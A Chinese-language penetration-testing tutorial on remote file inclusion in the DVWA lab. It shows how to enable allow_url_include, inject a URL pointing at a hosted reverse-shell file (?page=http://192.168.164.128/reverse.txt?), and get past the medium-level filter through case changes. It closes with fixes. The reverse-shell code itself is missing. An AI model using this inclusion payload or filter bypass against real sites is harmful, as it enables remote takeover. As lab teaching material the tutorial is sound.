渗透测试之远程文件包含
2022/2/27 23:52:39
本文主要是介绍渗透测试之远程文件包含,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
一、远程文件包含环境配置。
远程文件包含与上篇讲到的本地文件包含不同,是一种特例。
我们需要到Metasploit配置一下环境。
sudo nano /etc/php5/cgi/php.ini PHP配置文件
ctrl+w 搜索allow_url ,将allow_url_include = Off 改成On ctrl+x退出
完成后重启Web服务器
sudo etc/init.d/apache2 restart
======================================================================================================
二、远程文件包含漏洞-发现和利用
1. 创建一个reverse.txt文本文件,里面写入反弹shell的php代码如下:
2.将reverse.txt放入 /var/www/html文件夹下
3.本地浏览器访问查看
首先,kali开启web服务
然后浏览器访问:这里是txt不是php,因为我们不需要攻击主机去执行,需要的是目标服务器远程执行这条命令。
开启监听端口:
返回dvwa 文件包含那部分输入 ?page=http://192.168.164.128/reverse.txt?
监听端口成功连接,获得目标主机的控制权。
=================================================================
三、利用高级远程文件包含漏洞入侵网站。
将security level 设置为medium重复上述步骤,发现该漏洞已经修复。
报错,说明中级的防护应该做了过滤,我们试试过滤有没有对大小写进行限制。http修改成Http发现命令执行,说明过滤器对大小写不敏感,容易绕过。
查看源码发现也只是过滤了http:// https:// 所以使用过滤器并不是很好的防护,容易遗漏,过滤不全。
==========================================================================================
四、安全性-修复文件包含漏洞
1)RFI 远程文件包含漏洞解决方法:
禁止 allow_url_fopen & allow_url_include
sudo nano /etc/php5/cgi/php.ini
2)LFI 本地文件包含漏洞解决方法:
使用静态的文件包含
这篇关于渗透测试之远程文件包含的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-12-27OpenFeign服务间调用学习入门
- 2024-12-27OpenFeign服务间调用学习入门
- 2024-12-27OpenFeign学习入门:轻松掌握微服务通信
- 2024-12-27OpenFeign学习入门:轻松掌握微服务间的HTTP请求
- 2024-12-27JDK17新特性学习入门:简洁教程带你轻松上手
- 2024-12-27JMeter传递token学习入门教程
- 2024-12-27JMeter压测学习入门指南
- 2024-12-27JWT单点登录学习入门指南
- 2024-12-27JWT单点登录原理学习入门
- 2024-12-27JWT单点登录原理学习入门